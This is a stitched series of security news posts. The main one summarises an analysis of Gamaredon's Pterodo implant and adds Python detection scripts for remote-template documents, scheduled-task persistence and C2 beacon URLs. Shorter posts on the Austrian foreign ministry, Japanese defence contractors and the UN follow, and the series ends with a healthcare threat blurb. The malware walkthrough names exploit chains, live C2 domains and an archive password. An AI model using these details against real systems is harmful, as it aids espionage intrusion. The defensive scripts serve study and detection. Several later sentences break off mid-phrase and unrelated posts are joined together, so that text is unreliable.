Security experts from Cybaze-Yoroi ZLab have published a detailed analysis of an implant used by the Gamaredon APT group in a recent campaign.
Gamaredon Group is a persistent cyber espionage operation attributed to Russia's FSB (Federal Security Service), part of a long-term military and geopolitical confrontation with the Ukrainian government and, more generally, with the Ukrainian military.
In recent months, Ukraine's CERT (CERT-UA) reported an intensification of Gamaredon attacks against military targets. The latest wave dates back to the end of November 2019 and was first analyzed by Vitali Kremez. Starting from those findings, the Cybaze-Yoroi ZLab team performed a technical analysis of the latest Pterodo implant (also tracked as Pteranodon).
The infection chain begins with a weaponized Office document named “f.doc”. Basic information about it is provided in the following table.
| Threat | Gamaredon Pteranodon weaponized document |
|---|---|
| Brief Description | Doc file weaponized with an exploit |

Table 1. Information about the initial dropper
The decoy document is written in Ukrainian, mixed with many special characters, to lure the target into opening it; once opened, it appears as in the following figure.
The document leverages the well-known exploit CVE-2017-0199 and tries to download a second stage from “hxxp://win-apu.]ddns.]net/apu.]dot”.
Because this is a remote code execution exploit, no user interaction is required: the “enable macro” prompt is never shown. The downloaded file has a “.dot” extension, which Microsoft Word uses for templates shared by documents with a similar layout. Basic information on the “.dot” file is provided below:
| Threat | Gamaredon Pteranodon loader dot file |
|---|---|
| Brief Description | Dot file enabling the infection of the Gamaredon Pteranodon |

Table 2. Information about the second stage
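The first stage never shows a macro prompt because Word resolves the reference to the remote template on its own. The check below is an added example, not code from the Cybaze-Yoroi report: it opens an OOXML Word container, lists every package relationship whose TargetMode is External, and flags the types Word fetches automatically on open (attachedTemplate, which is what a remote template like apu.dot uses, and oleObject, the form used by CVE-2017-0199 documents). The sample document is constructed in memory with the report's win-apu.ddns.net indicator as the target string; nothing is downloaded. The report's own f.doc is a legacy binary .doc, which is not a zip container; for that format the equivalent extraction is done with oleobj from the oletools suite.

```python
"""Triage an OOXML Word file for relationships that point outside the package.

Added example, not code from the Cybaze-Yoroi report: a remote template
(attachedTemplate) or a linked OLE object with TargetMode="External" is what
makes Word fetch a second stage, such as apu.dot, without any macro prompt.
The sample document is constructed in memory; nothing is downloaded.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types Word resolves automatically when the file is opened.
# A hyperlink is also External but needs a click, so it is deliberately absent.
AUTO_FETCH_TYPES = {"attachedTemplate", "oleObject"}


def find_external_relationships(doc_bytes):
    """Return (rels part, relationship type, target) for every External relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "").replace(OFFICE_REL, "")
                found.append((name, rel_type, rel.get("Target", "")))
    return found


def flag_auto_fetch(findings):
    """Keep the relationships that make Word contact a remote location on open."""
    remote = ("http://", "https://", "file://", "\\\\")
    return [f for f in findings
            if f[1] in AUTO_FETCH_TYPES and f[2].lower().startswith(remote)]


def build_sample_document():
    """Constructed sample: an external attachedTemplate (the shape of the
    Gamaredon chain), an internal styles relationship and an ordinary hyperlink."""
    settings_rels = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate"
    Target="http://win-apu.ddns.net/apu.dot" TargetMode="External"/>
</Relationships>"""
    document_rels = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OFFICE_REL}hyperlink"
    Target="https://www.example.com/" TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/settings.xml", "<settings/>")
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


if __name__ == "__main__":
    doc = build_sample_document()
    for part, rel_type, target in flag_auto_fetch(find_external_relationships(doc)):
        print(f"[!] {part}: {rel_type} -> {target}")
```

On a real file, replace build_sample_document() with the bytes of the suspect .docx or .dotm; a hit on settings.xml.rels with an HTTP or UNC target is a remote template, a hit on document.xml.rels with an oleObject type is the CVE-2017-0199 shape.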
Opening the downloaded template shows an empty document that asks the user to enable macros.
The body of the macro can be logically divided into two distinct parts:
- The first sets the registry key “HKEY_CURRENT_USER\Software\Microsoft\Office\” & Application.Version & “\Word\Security\” (the subkey under which Word keeps its macro security settings) and declares some other variables, such as the drop URL “get-icons.]ddns.net”;
- The second sets up the persistence mechanism by writing VBScript code to the Startup folder under the name “templates.vbs”. This VBS is in effect the same code the macro runs inside Word's macro engine.
The file written to the Startup folder is shown below:
Analyzing the content of “templates.vbs”, we see that it defines a variable holding a URL such as “hxxp://get-icons.]ddns.]net/ADMIN-PC_E42CAF54//autoindex.]php”, built as “hxxp://get-icons.]ddns.]net/” & NlnQCJG & “_” & uRDEJCn & “//autoindex.]php”, where “NlnQCJG” is the name that identifies the computer on the network and “uRDEJCn” is the serial number of the drive in hexadecimal. The script downloads the next stage from this URL, stores it under “C:\Users\admin\AppData\Roaming\” with a random name and, at the end, forces the machine to reboot.
The dropped sample is an SFX archive, in keeping with the tradition of Gamaredon implants.
| Threat | Gamaredon Pteranodon implant SFX archive |
|---|---|
| Brief Description | SFX Archive First Stage |

Table 3. Information about the first SFX archive
Opening the SFX archive reveals two files, named “8957.cmd” and “28847”, shown below.
When executed, the SFX archive extracts its contents and runs “8957.cmd”. The batch script looks like the following screen:
It contains several junk instructions meant to make analysis harder. Cleaning the script, we obtain:
At this point the batch script renames the “28847” file to “28847.exe”, opens it with the password “pfljk,fkbcerbgblfhs”, renames the file it contains to “WuaucltIC.exe” and finally runs it with “-post.php” as argument.
The fact that “28847.exe” can be opened with a password tells us that “28847” is another, password-protected, SFX archive. Some static information about it:
| Threat | Gamaredon Pteranodon implant SFX archive |
|---|---|
| Brief Description | SFX Archive Second Stage |

Table 4. Information about the second SFX archive
Exploring it, several files are visible inside, including the “6323” file. The following figure shows the complete list.
In this case the SFX archive contains eight files: five of them are legitimate DLLs used by the “6323” executable to interoperate with the OLE format used by Microsoft Office. The “ExcelMyMacros.txt” and “wordMacros.txt” files contain further macro code, described next. Static analysis of the “6323” file reveals its nature: it is written in .NET with Microsoft Visual Studio, and is therefore easy to reverse. Before reversing it, the executable can be cleaned to reduce its size and the amount of junk instructions in the code. The image below shows information about the sample before and after cleaning.
The source code looks as follows.
The first check is on the arguments: if no argument is supplied, the malware terminates. It then checks whether the files “ExcelMyMacros.txt” and “wordMacros.txt” exist in the directory it runs from: if so, it reads their contents, otherwise it exits.
Part of the content of the variable “xVGlMEP”:
There is only a small difference between the two files.
As the previous figure shows, the only differences between the files are the variable names, the registry key and the paths, which refer to Word in one case and Excel in the other. Finally, the macros are executed through the Office engine, as shown in the following figure.
Let's dissect the macros. For clarity we consider only one of them, “wordMacros.txt”. First, the macro sets the registry key “HKEY_CURRENT_USER\Software\Microsoft\Office\” & Application.Version & “\Word\Security\”, then it creates two scheduled tasks that run every 12 and 15 minutes respectively: the first runs “IndexOffice.vbs” from “%APPDATA%\Microsoft\Office\”, the second runs “IndexOffice.exe” from the same path.
Finally, the malware writes the file “IndexOffice.txt” to “%APPDATA%\Microsoft\Office\”. The following figure shows what has just been described:
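The two scheduled tasks are the most durable host artifact in this chain, and their shape (a repetition interval of a few minutes, an action under the user's roaming Office folder) is something Office itself never creates. The script below is an added example, not code from the Cybaze-Yoroi report: it parses Task Scheduler XML of the kind produced by `schtasks /query /xml` or stored under C:\Windows\System32\Tasks, converts the ISO 8601 repetition interval to minutes and flags tasks that both repeat within 15 minutes and execute from %APPDATA%\Microsoft\Office\. The task names, the trigger start time and the benign third task are constructed for the demonstration; the report gives only the intervals, the file names and the path.

```python
r"""Flag Task Scheduler definitions that look like the Pterodo persistence.

Added example, not code from the Cybaze-Yoroi report. Task names and the
benign defrag task are constructed; the 12/15 minute intervals and the
%APPDATA%\Microsoft\Office path come from the report.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"
# ISO 8601 durations as Task Scheduler writes them: PT12M, PT1H30M, P7D
DURATION_RE = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")
# Office does not register tasks in the roaming profile; anything run from here is odd.
OFFICE_APPDATA_RE = re.compile(r"(%appdata%|\\appdata\\roaming)\\microsoft\\office\\", re.I)


def duration_minutes(iso):
    """Convert a Task Scheduler duration to minutes; None if it does not parse."""
    m = DURATION_RE.match(iso or "")
    if not m:
        return None
    days, hours, mins, secs = (int(x) if x else 0 for x in m.groups())
    return days * 1440 + hours * 60 + mins + secs / 60


def parse_task(xml_text):
    """Extract the task URI, the shortest repetition interval and the Exec actions."""
    def tag(name):
        return f"{{{TASK_NS}}}{name}"
    root = ET.fromstring(xml_text)
    uri = root.findtext(f"./{tag('RegistrationInfo')}/{tag('URI')}", default="")
    intervals = [duration_minutes(e.text) for e in root.iter(tag("Interval"))]
    intervals = [i for i in intervals if i is not None]
    actions = []
    for exe in root.iter(tag("Exec")):
        cmd = (exe.findtext(tag("Command")) or "").strip()
        args = (exe.findtext(tag("Arguments")) or "").strip()
        actions.append((cmd + " " + args).strip())
    return {"uri": uri, "min_interval": min(intervals) if intervals else None,
            "actions": actions}


def is_pterodo_like(task, max_interval=15):
    """Both traits together: a short repeat interval and an action under the Office roaming path."""
    runs_from_office = any(OFFICE_APPDATA_RE.search(a) for a in task["actions"])
    short = task["min_interval"] is not None and task["min_interval"] <= max_interval
    return runs_from_office and short


def load_task_file(path):
    """Exported task XML is UTF-16; strip the declaration so ET parses the str."""
    with open(path, encoding="utf-16") as fh:
        text = fh.read()
    return parse_task(re.sub(r"^\s*<\?xml[^>]*\?>", "", text))


# Constructed samples: two modelled on the report's IndexOffice tasks, one benign.
SAMPLE_TASKS = [
    r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\IndexOffice</URI></RegistrationInfo>
  <Triggers><TimeTrigger><Repetition><Interval>PT12M</Interval></Repetition>
    <StartBoundary>2019-11-28T10:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>wscript.exe</Command>
    <Arguments>"%APPDATA%\Microsoft\Office\IndexOffice.vbs"</Arguments></Exec></Actions>
</Task>""",
    r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\IndexOfficeUpdate</URI></RegistrationInfo>
  <Triggers><TimeTrigger><Repetition><Interval>PT15M</Interval></Repetition>
    <StartBoundary>2019-11-28T10:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>%APPDATA%\Microsoft\Office\IndexOffice.exe</Command>
    </Exec></Actions>
</Task>""",
    r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Defrag\ScheduledDefrag</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><Repetition><Interval>P7D</Interval></Repetition>
    <StartBoundary>2019-01-01T01:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>%windir%\system32\defrag.exe</Command>
    <Arguments>-c -h -k -g -$</Arguments></Exec></Actions>
</Task>""",
]

if __name__ == "__main__":
    for xml_text in SAMPLE_TASKS:
        task = parse_task(xml_text)
        mark = "[!]" if is_pterodo_like(task) else "[ ]"
        print(mark, task["uri"], task["min_interval"], task["actions"])
```

To sweep a live host, feed load_task_file() every file under C:\Windows\System32\Tasks (they have no extension) or the output of `schtasks /query /xml /tn <name>`; the interval threshold is deliberately a parameter because other Gamaredon samples are not bound to 12 and 15 minutes.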
The script checks for the presence of the “IndexOffice.exe” artifact: if it exists, it deletes it and downloads a new file/script from “hxxp://masseffect.]space/<PC_Name>_<Hex_Drive_SN>/post.]php”.
The malware saves the C2 response and encodes it with an Encode function. This function takes three parameters: the input file, the output file and arrKey; arrKey is computed by the GetKey function, which takes the hexadecimal drive serial number of the machine as input and returns the key. Because the key is derived from a per-host value, a payload recovered from one machine cannot be decoded without that machine's drive serial number. Part of the Encode function and the complete GetKey function are shown below.
Visiting the C2 web page returns a “Forbidden” message, which means the domain is still active but refuses incoming requests that do not match what the implant sends.
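Both VBS stages in this chain (templates.vbs with its autoindex.php URL and the later IndexOffice stage with post.php) embed the same victim identifier, the computer name and the drive serial number in hexadecimal, in the URL path. That makes the path shape itself a hunting key that survives a change of domain. The code below is an added example, not code from the Cybaze-Yoroi report: it rebuilds the identifier for a given host, produces the two URLs that host would request, and matches the URL shape in constructed proxy log lines, rating hits on the two domains named in the report higher than hits on unknown hosts. It assumes the serial is rendered as uppercase hexadecimal without extra padding (the report's sample is E42CAF54) and that the log format is `<time> <client ip> <method> <url> <status>`; the log lines are constructed for the demonstration.

```python
"""Derive the per-victim URL used by the Pterodo VBS stages and hunt for it in proxy logs.

Added example, not code from the Cybaze-Yoroi report. Assumptions: the serial
is uppercase hex (sample: E42CAF54) and proxy lines are
"<time> <client ip> <method> <url> <status>". The log lines are constructed.
"""
import re

KNOWN_C2 = {"get-icons.ddns.net", "masseffect.space"}

# Path shape: /<NetBIOS name>_<hex serial>/ then one or more slashes (the report's
# first URL has a double slash) and either autoindex.php or post.php.
BEACON_RE = re.compile(
    r"^https?://(?P<host>[^/\s]+)/"
    r"(?P<victim>[A-Za-z0-9-]{1,15}_[0-9A-Fa-f]{1,8})"
    r"/+(?P<script>autoindex\.php|post\.php)$"
)


def victim_id(computer_name, volume_serial):
    """Recreate the identifier the VBS builds from the host name and drive serial."""
    return f"{computer_name.upper()}_{volume_serial:X}"


def expected_beacons(computer_name, volume_serial):
    """The two URLs a given host would request, for a targeted proxy-log search."""
    vid = victim_id(computer_name, volume_serial)
    return [
        f"http://get-icons.ddns.net/{vid}//autoindex.php",
        f"http://masseffect.space/{vid}/post.php",
    ]


def hunt(log_lines):
    """Match the URL shape regardless of domain; the report's C2 hosts raise confidence."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        src_ip, url = fields[1], fields[3]
        m = BEACON_RE.match(url)
        if not m:
            continue
        hits.append({
            "src": src_ip,
            "host": m["host"],
            "victim_id": m["victim"],
            "script": m["script"],
            "confidence": "high" if m["host"].lower() in KNOWN_C2 else "medium",
        })
    return hits


# Constructed proxy lines: two beacons to the reported domains, one to an unknown
# host with the same path shape, one unrelated request.
SAMPLE_PROXY_LOG = [
    "2019-12-02T10:14:03Z 10.0.0.21 GET http://get-icons.ddns.net/ADMIN-PC_E42CAF54//autoindex.php 200",
    "2019-12-02T10:26:17Z 10.0.0.21 GET http://masseffect.space/ADMIN-PC_E42CAF54/post.php 403",
    "2019-12-02T10:27:00Z 10.0.0.35 GET http://updates.example.com/WS-07_1A2B3C4D/post.php 200",
    "2019-12-02T10:28:41Z 10.0.0.40 GET https://www.example.org/index.php 200",
]

if __name__ == "__main__":
    print(expected_beacons("ADMIN-PC", 0xE42CAF54))
    for hit in hunt(SAMPLE_PROXY_LOG):
        print(hit)
```

The 403 on the second constructed line mirrors what the report observed when browsing the C2 directly: a Forbidden response does not mean the infrastructure is dead, only that the request did not look like one from the implant, so a 403 to a URL of this shape is still a hit.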
Gamaredon cyberwarfare operations against Ukraine are still active. This technical analysis shows that the group's modus operandi has remained almost identical over the years.
The massive use of weaponized Office documents, Office template injection, SFX archives, WMI and VBA macro stages that change dynamically makes the Pterodo attack chain very malleable and adaptive. However, the introduction of a .NET component is a novelty compared to previous Pterodo samples.
Further technical details, including Indicators of Compromise and YARA rules, are reported in the analysis published by the experts at Cybaze-Yoroi ZLab.
The post Cyberwarfare: A deep dive into the latest Gamaredon Espionage Campaign appeared first on Security Affairs.
Austria's foreign ministry announced that the cyber attack against its systems, allegedly carried out by a state actor, has ended.
Earlier in January, Austria's foreign ministry announced it was facing a “serious
“Due to the gravity and nature of the attack, it cannot be ruled out that this is a targeted attack by a state actor,” the foreign ministry said at the time in a joint statement with the interior ministry.
“Despite all the intensive security measures, there is no 100-percent protection against cyberattacks.”
The attack took place on the evening of Saturday 4 January and was quickly detected. Local reports revealed that it targeted the ministry's IT infrastructure.
Authorities immediately adopted defensive measures to protect their infrastructure and set up a special committee to respond to the incident. It is not clear whether the hackers gained access to sensitive data.
This week, the Austrian foreign ministry announced that the cyber attack against its systems has ended.
“After really intensive work and excellent cooperation between all the departments involved, last weekend we managed to clean up our IT systems and end the cyber attack on the Foreign Ministry,” said Foreign Minister Alexander Schallenberg. “The highest possible data security at the Foreign Ministry is guaranteed and no damage to the IT equipment could be detected.”
“According to current knowledge, this was a targeted attack against the Foreign Ministry with the intention of gathering information. However, due to the dimension and the high complexity, it cannot yet be said beyond doubt who is behind the attack.”
The authorities are still investigating the attack, but government experts have no doubt that it was a targeted cyber-espionage operation against the Foreign Ministry.
“Espionage is a serious
Intelligence experts speculated the involvement of Russian or Chinese cyber
“The entire course of this
The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America and former Soviet bloc nations.
The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.
Major cyber attacks are rare in Austria; only a few large-scale attacks have been observed in past years. In September 2019, before the National Council election, the ÖVP was hit by a “very targeted hacker attack” on its party headquarters.
In 2018, the websites of the parliament and various ministries in Austria were targeted by DDoS (Distributed Denial of Service) attacks.
Other European countries have suffered similar attacks: in 2015 more than 20,000 computers belonging to the German Bundestag were infected with malware, and experts and media reported a possible involvement of Russian state-sponsored hackers.
The post The cyber attack against Austria’s foreign ministry has ended appeared first on Security Affairs.
Japanese defense contractors Pasco and Kobe Steel have disclosed security breaches they suffered back in 2016 and 2018.
Pasco is Japan's largest geospatial provider and Kobe Steel is one of the country's major steel manufacturers. Just last week, Japan's Ministry of Defense announced that, in addition to Mitsubishi Electric and NEC's defense business division, two other unnamed contractors had suffered a data breach.
The Japanese Defense Minister Taro Kono said during a p
After the announcement, both Pasco and Kobe Steel disclosed the incidents. While Pasco declared that it had found no evidence that personal or business information had been stolen by attackers, Kobe confirmed that some files may have been
Kobe identified unauthorized access to its network in August 2016 and in June 2017, while Pasco detected its intrusion in May 2018.
However, contrary to what Kobe declared in its official statement, the N
The Japanese Defense Minister Taro Kono added that there is no evidence that the attacks are related to each other.
The Mitsubishi Electric breach was detected almost eight months ago, on June 28, 2019; the delay in disclosure is attributed to the increased complexity of the investigation, since the attackers deleted activity logs.
The Tick hacker group has been targeting Japanese heavy industry, manufacturing and international relations since at least 2012,
According to the experts, the group is linked to the People's Republic of China and is focused on exfiltrating confidential data. The attackers exploited a directory traversal and arbitrary file upload vulnerability in the Trend Micro OfficeScan antivirus, tracked as CVE-2019-18187.
“According to people involved, Chinese hackers Tick may have been involved. According to Mitsubishi Electric, ‘logs (to check for leaks) have been deleted and it is not possible to confirm whether or not they actually leaked,’” reported the Nikkei.
“According to the company, at least tens of PCs and servers in Japan and overseas have been found to have been compromised. The amount of unauthorized access is approximately 200 megabytes, mainly for documents.”
A few days later, the IT giant NEC confirmed that its defense business division had suffered a security breach back in December 2016.
The Japanese firm confirmed the unauthorized access to its internal network after Japanese newspapers disclosed the incident, citing sources informed of the event.
NEC is a contractor for Japan’s defense industry and was involved in various defense projects.
Roughly 28,000 files were found by the company on one of the compromised servers, some of them containing information about defense equipment.
Experts believe the attacks on Japanese defense contractors were part of a cyber espionage campaign carried out by Chinese hackers.
The post Japanese defense contractors Pasco and Kobe Steel disclose security breaches appeared first on Security Affairs.
A leaked confidential report from the United Nations revealed that dozens of servers belonging to the United Nations were “compromised” at offices in Geneva and Vienna.
An internal confidential report from the United N
One of the offices that were hit by a sophisticated cyber attack is the U.N.
“One U.N. official told the AP that the hack, which was first detected over the summer, appeared “sophisticated” and that the extent of the damage remains unclear, especially in terms of p
The level of sophistication of the attack and the specific nature of the target suggests the involvement of a nation-state actor.
“We were hacked,” declared U.N.
The report states that at least 42 servers were “compromised,” three of them belonging to the Office of the High Commissioner for Human Rights. Experts suspect that another 25 servers located at the United Nations offices in Geneva and Vienna were compromised as well.
“Technicians at the United Nations office in Geneva, the world body’s European hub, on at least two occasions worked through weekends in recent months to isolate the local U.N. data center from the Internet, re-write p
The post Leaked confidential report states United Nations has been hacked appeared first on Security Affairs.
The healthcare industry faces a range of threat groups and malicious activity. Given the critical role that healthcare plays within society and its relationship with our most sensitive information, the risk to this sector is especially consequential. It may also be one of the major reasons why we find healthcare to be one of the most retargeted industries.
In our new report, Beyond Compliance: Cyber Threats and Healthcare, we share an update on the types of threats observed affecting healthcare organizations: from criminal targeting of patient data to less frequent, but still high-impact, cyber espionage intrusions, as well as disruptive and destructive threats. We urge you to review the full report for these insights; meanwhile, here are two key areas to keep in mind.
- Chinese espionage targeting of medical researchers: We have seen medical research, specifically cancer research, continue to be a focus of multiple Chinese espionage groups. While the extent is difficult to assess fully, years of cyber-enabled theft of research trial data may be starting to have an impact, as Chinese companies are reportedly now manufacturing cancer drugs at lower cost than Western firms.
- Healthcare databases for sale for under $2,000: The sheer number of healthcare-associated databases for sale in the underground is outrageous. Even more concerning, many of these databases can be purchased for under $2,000 (based on sales we observed over a six-month period).
To learn more about the types of financially motivated cyber threat activity impacting healthcare organizations, the nation state threats the healthcare sector should be aware of, and how the threat landscape is expected to evolve, check out the full report, or listen to the podcast conversation between Principal Analyst Luke McNamara and Grady Summers, EVP, Products.
For a closer look at the latest breach and threat landscape trends facing the healthcare sector, register for our Sept. 17, 2019, webinar.
For more details around an actor who has targeted healthcare, read about our newly revealed APT group, APT41.